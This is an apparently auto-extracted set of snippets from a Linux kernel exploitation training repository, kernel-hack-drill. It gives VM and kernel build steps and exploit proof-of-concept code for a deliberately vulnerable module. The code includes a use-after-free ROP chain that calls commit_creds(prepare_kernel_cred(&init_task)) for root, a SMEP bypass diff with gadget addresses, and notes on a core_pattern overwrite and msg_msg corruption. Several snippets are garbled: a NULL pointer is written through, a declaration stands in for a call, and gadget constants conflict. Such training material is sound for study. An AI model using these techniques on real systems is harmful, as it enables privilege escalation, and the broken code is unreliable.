### Install Build Tools on Ubuntu Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Installs necessary tools for building the kernel module and other binaries on Ubuntu Server 24.04. ```bash sudo apt install git make gcc ``` -------------------------------- ### Start QEMU Virtual Machine for Kernel Testing Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Launches a QEMU virtual machine with specific hardware and network configurations, including a serial console and port forwarding for SSH access. The pre-built kernel image is loaded. ```bash qemu-system-x86_64 \ -s \ -enable-kvm \ -m 2G \ -cpu qemu64 \ -smp 2 \ -drive file=~/rootfs.img \ -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \ -net nic,model=e1000 \ -nographic \ -no-reboot \ -kernel ~/linux/arch/x86/boot/bzImage \ -append "console=ttyS0 earlyprintk=serial net.ifnames=0 root=/dev/sda" \ -pidfile vm.pid \ 2>&1 | tee vm.log ``` -------------------------------- ### Create Debian Bookworm Rootfs Image Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Generates a basic Debian Bookworm root filesystem image using debootstrap for virtual machine setup. ```bash cd ~ && touch rootfs.img dd if=/dev/zero of=rootfs.img bs=1M count=2048 mkfs.ext4 rootfs.img sudo mkdir /mnt/rootfs sudo mount rootfs.img /mnt/rootfs sudo apt install debian-archive-keyring sudo debootstrap bookworm /mnt/rootfs http://deb.debian.org/debian/ # chroot into /mnt/rootfs and make additional tweaks, like adding a user sudo umount /mnt/rootfs ``` -------------------------------- ### Install and Test Kernel Module Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Loads the compiled kernel module and runs a basic test to verify its functionality. ```bash sudo insmod drill_mod.ko ./drill_test ``` -------------------------------- ### Install Kernel Module in VM Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Loads the `drill_mod.ko` kernel module into the running virtual machine's kernel using `insmod`. This action may taint the kernel. ```bash user@hostname ~> sudo insmod drill_mod.ko [sudo] password for user: [ 23.925524] drill_mod: loading out-of-tree module taints kernel. [ 23.928631] drill: start hacking user@hostname ~> ``` -------------------------------- ### Install Linux Kernel Build Dependencies Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Installs essential packages required for compiling the Linux kernel on Debian-based systems. ```bash sudo apt install git make gcc flex bison libncurses5-dev libssl-dev libelf-dev dwarves xz-utils zstd ``` -------------------------------- ### Kernel Exploit PoC Setup and ROP Chain Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md This C code implements a kernel exploit that leverages a use-after-free vulnerability to perform a control flow hijack via ROP. It sets up a fake stack in userspace and chains ROP gadgets to execute `prepare_kernel_cred` and `commit_creds` to gain root privileges. Ensure kernel mitigations like SMEP and SMAP are disabled and specific kernel configurations are met. ```diff --- drill_uaf_callback.c 2025-04-28 12:42:18.516016046 +1000 +++ drill_uaf_callback_rop_smep.c 2025-04-28 16:03:49.757000192 +1000 @@ -9,10 +9,24 @@ * - CONFIG_RANDOM_KMALLOC_CACHES * * 2) Disable mitigations: - * - run qemu with "-cpu qemu64,-smep,-smap". + * - run qemu with "-cpu qemu64,+smep,-smap". * - run the kernel with "pti=off nokaslr". * - * This PoC performs control flow hijack and gains LPE. + * 3) Check your kernel version: + * - head at v6.12.7 tag, + * 319addc2ad901dac4d6cc931d77ef35073e0942f + * + * 4) Difference from `defconfig`: + * - CONFIG_CONFIGFS_FS=y + * - CONFIG_SECURITYFS=y + * - CONFIG_DEBUG_INFO=y + * - CONFIG_DEBUG_INFO_DWARF4=y + * - CONFIG_DEBUG_INFO_COMPRESSED_NONE=y + * - CONFIG_GDB_SCRIPTS=y + * + * 5) Compiler is gcc, version 11.4.0 + * + * This PoC performs control flow hijack and gains LPE and SMEP buypass via ROP/JOP. */ #define _GNU_SOURCE @@ -29,28 +43,74 @@ #include #include "drill.h" +/* payload mmap() defines */ #define MMAP_SZ 0x1000 #define PAYLOAD_SZ 95 +/* fake stack mmap() defines */ +#define FAKE_STACK_ADDR 0xf6000000 /* STACKPIVOT_GADGET_PTR changes rsp to this value */ +#define PAGE_SIZE 0x1000 +#define MMAP_ADDR (FAKE_STACK_ADDR - PAGE_SIZE) +#define MMAP_SIZE (PAGE_SIZE * 2) + /* ============================== Kernel stuff ============================== */ /* Addresses from System.map (no KASLR) */ -#define COMMIT_CREDS_PTR 0xffffffff81123b20lu -#define PREPARE_KERNEL_CRED_PTR 0xffffffff81124080lu -#define INIT_TASK_PTR 0xffffffff83411080lu - typedef int __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred); +/* Addresses from System.map (no KASLR) */ +#define COMMIT_CREDS_PTR 0xffffffff810c0960UL +#define PREPARE_KERNEL_CRED_PTR 0xffffffff810c0bf0UL +#define INIT_TASK_PTR 0xffffffff82a0c940UL + +/* ROP gadgets */ +#define STACKPIVOT_GADGET_PTR 0xffffffff81c1349bUL /* mov esp, 0xf6000000 ; ret */ +#define POP_RDI 0xffffffff810862ccUL /* pop rdi ; ret */ +#define POP_RAX 0xffffffff810604c4UL /* pop rax ; ret */ +#define JMP_RAX 0xffffffff810372abUL /* jmp rax */ +#define PUSH_RAX_POP_RSI 0xffffffff81d1da58UL /* push rax ; pop rsi ; ret */ +#define PUSH_RSI_POP_RDI_JMP 0xffffffff810f1a26UL /* push rsi ; pop rdi ; add eax, dword ptr [rax] ; jmp 0xffffffff810f19de */ +#define XCHG_RAX_RBP 0xffffffff81633c34UL /* xchg rax, rbp ; ret */ +#define SUB_RAX_RDI 0xffffffff81f2ec90UL /* sub rax, rdi ; ret */ +#define PUSH_RAX_POP_RSP_DEC_PTR_RAX 0xffffffff81d186f5UL /* push rax ; pop rsp ; dec DWORD PTR [rax-0x7d] ; ret */ -_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS_PTR; -_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED_PTR; + +/* ========================================================================== */ -void root_it(void) +void build_stack() { -commit_creds(prepare_kernel_cred(INIT_TASK_PTR)); + char *mmaped_area = mmap((void *)MMAP_ADDR, MMAP_SIZE, PROT_WRITE, + MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0); + unsigned long *fake_stack = NULL; + unsigned long off = 0; + + if (mmaped_area < 0) { + perror("[-] mmap"); + exit(EXIT_FAILURE); + } + if (mmaped_area != (void *)MMAP_ADDR) { + printf("[-] mmaped to wrong addr: %p\n", mmaped_area); + exit(EXIT_FAILURE); + } + printf("[+] mmaped_area is at %p\n", mmaped_area); + memset(mmaped_area, 0, MMAP_SIZE); + + fake_stack = (unsigned long *)(mmaped_area + PAGE_SIZE); + printf("[+] fake stack for the ROP chain is at %p\n", fake_stack); + + fake_stack[off++] = POP_RDI; + fake_stack[off++] = INIT_TASK_PTR; /* passed as the 1st argument of the prepare_kernel_cred() */ + fake_stack[off++] = POP_RAX; + fake_stack[off++] = PREPARE_KERNEL_CRED_PTR; + fake_stack[off++] = JMP_RAX; /* executes prepare_kernel_cred(&init_task) */ + fake_stack[off++] = PUSH_RAX_POP_RSI; /* the value returned by prepare_kernel_cred is */ + fake_stack[off++] = PUSH_RSI_POP_RDI_JMP; /* passed to RDI 1st argument of the function */ + fake_stack[off++] = 0xdeadfeed; /* previous gadget adds 8 to rsp due to JMP */ + fake_stack[off++] = POP_RAX; + fake_stack[off++] = COMMIT_CREDS_PTR; } /* ========================================================================== */ ``` -------------------------------- ### Payload Preparation and Execution Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md This snippet shows the preparation and execution of a kernel payload using mmap and setxattr. It includes calls to helper functions and a system call. ```c #define MMAP_SZ 0x1000 #define PAYLOAD_SZ 0x100 #define DRILL_ACT_CALLBACK 0x10 int main(void) { void *spray_data; int act_fd; int ret; /* * Prepare */ do_cpu_pinning(); build_stack(); spray_data = mmap(NULL, MMAP_SZ, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (spray_data == MAP_FAILED) { perror("mmap"); return EXIT_FAILURE; } /* * Trigger */ printf("[+] spray data at %p\n", spray_data); ret = setxattr("./", "foobar", spray_data, PAYLOAD_SZ, 0); printf("setxattr returned %d\n", ret); /* * While debugging a ROP chain, I noticed repeated double_fault errors. * It turned out that by this time the scheduler slot was running out * and our process was being preempted by a new process * where the 'fake_stack' was not mmaped. * * This function frees the current CPU for other tasks, * effectively allowing the ROP chain (which executes after the second callback) * to execute from the new scheduler slot. */ int sched_yield(); if (act(act_fd, DRILL_ACT_CALLBACK, 3, NULL) == EXIT_FAILURE) goto end; printf("[+] DRILL_ACT_CALLBACK\n"); end: return ret; } ``` -------------------------------- ### Create Default Kernel Configuration Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Generates a default configuration file for the Linux kernel. ```bash make defconfig ``` -------------------------------- ### Compile Kernel Module and Binaries Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Builds the `drill_mod.ko` kernel module and associated userspace utilities. ```bash cd kernel-hack-drill make ``` -------------------------------- ### CPU Pinning and Callback Assignment Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md This function demonstrates CPU pinning and assigns a callback to an item. It's used in conjunction with payload preparation. ```c #define STACKPIVOT_GADGET_PTR 0x4141414141414141 int do_cpu_pinning(void) { struct item *item = NULL; void *p = NULL; size_t size = 0x100; p = mmap(NULL, size, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (p == MAP_FAILED) return EXIT_FAILURE; memset(p, 0x41, size); item->callback = (void (*)(void))STACKPIVOT_GADGET_PTR; printf("[+] payload:\n"); printf("\tstart at %p\n", p); return EXIT_SUCCESS; } ``` -------------------------------- ### Build the Linux Kernel Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Compiles the Linux kernel using all available processor cores for faster build times. ```bash make -j`nproc` ``` -------------------------------- ### Enable Kernel Configuration Options Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Enables specific configuration options (CONFIG_CONFIGFS_FS and CONFIG_SECURITYFS) required for certain kernel features, particularly on Debian-based systems. ```bash ./scripts/config -e CONFIG_CONFIGFS_FS -e CONFIG_SECURITYFS ``` -------------------------------- ### Run Kernel Module Tests Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Executes the test suite for the `drill_mod.ko` module to verify its functionality and error handling. ```bash ./drill_test ``` -------------------------------- ### Kernel Hardening Configuration for Ret2usr Exploit Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Details specific Linux kernel configurations and QEMU/kernel boot parameters required to disable or bypass certain kernel hardening mechanisms for testing exploits like ret2usr. ```text * 1) Compile the Linux kernel without: * - CONFIG_SLAB_BUCKETS * - CONFIG_RANDOM_KMALLOC_CACHES * * 2) Disable mitigations: * - run qemu with "-cpu qemu64,-smep,-smap". * - run the kernel with "pti=off nokaslr". ``` -------------------------------- ### Troubleshooting Kernel Module Version Mismatch Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Provides steps to resolve 'Invalid module format' errors when loading a kernel module, typically caused by rebuilding the module against a different kernel version than the one it's being loaded into. ```bash user@hostname ~> sudo insmod drill.ko insmod: ERROR: could not insert module drill.ko: Invalid module format user@hostname [1]> ``` -------------------------------- ### Transfer Kernel Module to VM via SCP Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Copies the compiled `drill_mod.ko` and related files from the host to the virtual machine using SCP, connecting to the forwarded SSH port. ```bash scp -r -P 10021 kernel-hack-drill user@localhost:/home/user/. ``` -------------------------------- ### Run Null Dereference Exploit Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md This snippet shows the output of running a null dereference exploit. It indicates the initial user ID, the payload address, and the memory map of the process. The exploit fails with a segmentation fault. ```bash drill@syzkaller:~$ ./drill_exploit_nullderef begin as: uid=1000, euid=1000 payload address: 0x55b911775349 [+] /proc/$PPID/maps: 00010000-00011000 rw-p 00000000 00:00 0 Segmentation fault ``` -------------------------------- ### Build Kernel Module with Custom Kernel Path Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Compiles the `drill_mod.ko` kernel module, specifying the path to the Linux kernel source code using the KPATH environment variable. ```bash cd kernel-hack-drill KPATH=~/linux/ make ``` -------------------------------- ### Clone Kernel Hack Drill Repository Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Obtains the source code for the kernel exploitation experiments. ```bash git clone https://github.com/a13xp0p0v/kernel-hack-drill.git ``` -------------------------------- ### Clean up temporary files in kernel exploit PoCs Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md This snippet demonstrates how to clean up temporary files generated by kernel exploit Proof-of-Concepts (PoCs). It shows the output of `make clean` and `git status` after running the clean command, highlighting untracked files. ```bash $ make clean [...] $ git status On branch master Your branch is up to date with 'origin/master'. Untracked files: (use "git add ..." to include in what will be committed) foobar forftok1 nothing added to commit but untracked files present (use "git add" to track) $ ``` -------------------------------- ### Clone Linux Kernel Source Code Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Fetches the Linux kernel source code from the official Git repository. ```bash git clone https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git ~/linux ``` -------------------------------- ### Kernel Stack Manipulation with JMP Instruction Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md This snippet demonstrates how to manipulate a fake stack in the kernel. It uses a JMP instruction to execute a function call and subsequent stack adjustments. ```c #define JMP_RAX 0xffffe000 #define XCHG_RAX_RBP 0x1f0f #define POP_RDI 0x5f #define SUB_RAX_RDI 0x29f7 #define PUSH_RAX_POP_RSP_DEC_PTR_RAX 0x4889f0 void build_stack() { unsigned long fake_stack[10]; int off = 0; fake_stack[off++] = JMP_RAX; /* executes commit_creds(prepare_kernel_cred(&init_task)) */ fake_stack[off++] = XCHG_RAX_RBP; /* RBP contains a pointer */ fake_stack[off++] = POP_RDI; /* that differs by 0x37 */ fake_stack[off++] = 0x37; /* from the old RSP */ fake_stack[off++] = SUB_RAX_RDI; fake_stack[off++] = PUSH_RAX_POP_RSP_DEC_PTR_RAX; /* restore the RSP and continue legitimate execution */ } ``` -------------------------------- ### SMAP bypass and LPE via core_pattern overwrite Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md This PoC implements a SMAP bypass using stack-based pivots in kernel space, enabling ROP/JOP execution. The payload overwrites `core_pattern` for local privilege escalation (LPE). ```c SMAP bypass is implemented via two stack-based pivot in kernel space, allowing execution ROP/JOP stored in `pt_regs`, `drill_item_t`. The payload overwrites `core_pattern`, resulting in a local privilege escalation (LPE). i also though about `goto end` . and i have to edit this label a bit because of my ROP/JOP chain which forces primary thread to sleep. can we discuss this and other parts of code to refactor? will do my best ``` -------------------------------- ### Fix shm_open build error on older Debian Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md This snippet shows the build command used to fix an undefined reference to `shm_open` on older Debian systems. It links against `librt` and `pthread` to resolve symbol dependencies. ```bash gcc drill_uaf_w_pte.c -Wall -static -o drill_uaf_w_pte -lrt -pthread ``` -------------------------------- ### Expected Test Output Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/README.md Verifies that the `drill_test` execution produces the expected output lines, indicating successful operation of the module's core functionality and error handling. ```text [+] drill_act is opened [...] [+] looks like normal functionality in drill.ko works fine [...] [+] looks like error handling in drill.ko works fine ``` -------------------------------- ### Successful Kernel Module Compilation Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md Output after applying the fix, showing a successful compilation of the kernel module. This indicates that the variable declaration issue has been resolved. ```bash d@c553020e9dfc:/src/drill/kernel-hack-drill$ KPATH=../. make LLVM=1 gcc drill_test.c -Wall -static -o drill_test gcc drill_uaf_callback.c -Wall -static -o drill_uaf_callback gcc drill_uaf_callback_rop_smep.c -Wall -static -o drill_uaf_callback_rop_smep gcc drill_uaf_w_msg_msg.c -Wall -static -o drill_uaf_w_msg_msg gcc drill_uaf_w_pipe_buffer.c -Wall -static -o drill_uaf_w_pipe_buffer gcc drill_uaf_w_pte.c -Wall -static -o drill_uaf_w_pte gcc drill_uaf_w_pud.c -Wall -static -o drill_uaf_w_pud make -C ../. M=/src/drill/kernel-hack-drill modules make[1]: Entering directory '/src/drill' CC [M] /src/drill/kernel-hack-drill/drill_mod.o MODPOST /src/drill/kernel-hack-drill/Module.symvers CC [M] /src/drill/kernel-hack-drill/drill_mod.mod.o LD [M] /src/drill/kernel-hack-drill/drill_mod.ko make[1]: Leaving directory '/src/drill' d@c553020e9dfc:/src/drill/kernel-hack-drill$ ``` -------------------------------- ### Kernel Module Compilation Errors Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md Compilation errors encountered when building the kernel module with `clang`. These errors indicate issues with variable declarations and usage within the `drill_mod.c` file. ```bash d@c553020e9dfc:/src/drill/kernel-hack-drill$ git status On branch master Your branch is up to date with 'origin/master'. nothing to commit, working tree clean d@c553020e9dfc:/src/drill/kernel-hack-drill$ KPATH=../. make LLVM=1 -j16 gcc drill_test.c -Wall -static -o drill_test gcc drill_uaf_callback.c -Wall -static -o drill_uaf_callback gcc drill_uaf_callback_rop_smep.c -Wall -static -o drill_uaf_callback_rop_smep gcc drill_uaf_w_msg_msg.c -Wall -static -o drill_uaf_w_msg_msg gcc drill_uaf_w_pipe_buffer.c -Wall -static -o drill_uaf_w_pipe_buffer gcc drill_uaf_w_pte.c -Wall -static -o drill_uaf_w_pte gcc drill_uaf_w_pud.c -Wall -static -o drill_uaf_w_pud make -C ../. M=/src/drill/kernel-hack-drill modules make[1]: warning: jobserver unavailable: using -j1. Add '+' to parent make rule. make[1]: Entering directory '/src/drill' CC [M] /src/drill/kernel-hack-drill/drill_mod.o /src/drill/kernel-hack-drill/drill_mod.c:70:3: error: expected expression unsigned long val = 0; ^ /src/drill/kernel-hack-drill/drill_mod.c:84:32: error: use of undeclared identifier 'val' ret = kstrtoul(arg2_str, 0, &val); ^ /src/drill/kernel-hack-drill/drill_mod.c:97:42: error: use of undeclared identifier 'val' sizeof(struct drill_item_t) - sizeof(val)) ^ /src/drill/kernel-hack-drill/drill_mod.c:104:6: error: use of undeclared identifier 'val' val, n, (unsigned long)drill.items[n], ^ /src/drill/kernel-hack-drill/drill_mod.c:106:16: error: use of undeclared identifier 'val' *data_addr = val; /* No check, BAD BAD BAD */ ^ /src/drill/kernel-hack-drill/drill_mod.c:71:17: warning: mixing declarations and code is a C99 extension [-Wdeclaration-after-statement] unsigned long offset = 0; ^ 1 warning and 5 errors generated. make[2]: *** [scripts/Makefile.build:280: /src/drill/kernel-hack-drill/drill_mod.o] Error 1 make[1]: *** [Makefile:1822: /src/drill/kernel-hack-drill] Error 2 make[1]: Leaving directory '/src/drill' make: *** [Makefile:16: all] Error 2 d@c553020e9dfc:/src/drill/kernel-hack-drill$ ``` -------------------------------- ### Fix for Kernel Module Compilation Errors Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md A code diff showing the fix for the compilation errors in `drill_mod.c`. The solution involves moving variable declarations to the beginning of the function to comply with C standards and resolve undeclared identifier issues. ```diff d@c553020e9dfc:/src/drill/kernel-hack-drill$ git diff HEAD~1 diff --git a/drill_mod.c b/drill_mod.c index da17f7b..084b64b 100644 --- a/drill_mod.c +++ b/drill_mod.c @@ -27,6 +27,9 @@ static int drill_act_exec(long act, { int ret = 0; unsigned long n = 0; + unsigned long val = 0; + unsigned long offset = 0; + unsigned long *data_addr = NULL; if (!arg1_str) { pr_err("drill: item number is missing\n"); @@ -67,10 +70,6 @@ static int drill_act_exec(long act, break; case DRILL_ACT_SAVE_VAL: - unsigned long val = 0; - unsigned long offset = 0; - unsigned long *data_addr = NULL; - if (!arg2_str) { pr_err("drill: save_val: missing value\n"); return -EINVAL; d@c553020e9dfc:/src/drill/kernel-hack-drill$ ``` -------------------------------- ### New exploit for msg_msg->next corruption Source: https://github.com/a13xp0p0v/kernel-hack-drill.git/blob/master/issues.md This PR introduces a new out-of-bounds write exploit that corrupts `msg_msg->next`. This allows for a dangling reference to the next `msg_msg` and enables out-of-bounds reading of kernel memory by reclaiming a victim `msg_msg` with a fake one. ```c 1. tiny modification for `drill_mod.c` allowing OOBW 2. small change to `drill_test.c` 3. a basic out‑of‑bounds write exploit that corrupts `msg_msg->next` causing dangling reference to next `msg_msg`; it uses to reclaim victim `msg_msg` with *fake* `msg_msg` created via `sk_buff.data` enabling out-of-bounds reading of the kernel memory ``` === COMPLETE CONTENT === This response contains all available snippets from this library. No additional content exists. Do not make further requests.